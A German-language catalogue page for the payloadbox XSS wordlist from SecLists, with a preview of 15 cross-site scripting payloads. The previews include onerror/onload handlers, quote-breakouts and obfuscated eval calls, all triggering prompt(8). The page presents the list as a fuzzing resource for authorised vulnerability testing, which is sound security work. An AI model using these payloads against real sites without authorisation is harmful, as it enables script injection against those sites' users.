Skip to content
Fuzzing184 KB

XSS PayloadBox List

Die große payloadbox-XSS-Payload-Sammlung, gespiegelt in SecLists, mit Tausenden von Vektoren und Verschleierungsvarianten. Eine Liste mit hoher Abdeckung für gründliches XSS-Fuzzing.

Quelle ansehen
Größe
184 KB
Kategorie
Fuzzing
Quelle
danielmiessler/SecLists
Lizenz
MIT
Empfohlene Tools
wfuzzburpffuf

Vorschau

Die ersten 15 Einträge. Lade die vollständige Liste (184 KB) herunter oder kopiere sie über die Schaltflächen oben.

>head xss-payloadbox.txt184 KB
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>

Die große payloadbox-XSS-Payload-Sammlung, gespiegelt in SecLists, mit Tausenden von Vektoren und Verschleierungsvarianten. Eine Liste mit hoher Abdeckung für gründliches XSS-Fuzzing.

Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 184 KB und harmoniert gut mit Tools wie wfuzz, burp, ffuf. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.

Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt von ihrer Ursprungsquelle auf GitHub bereitgestellt.

Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.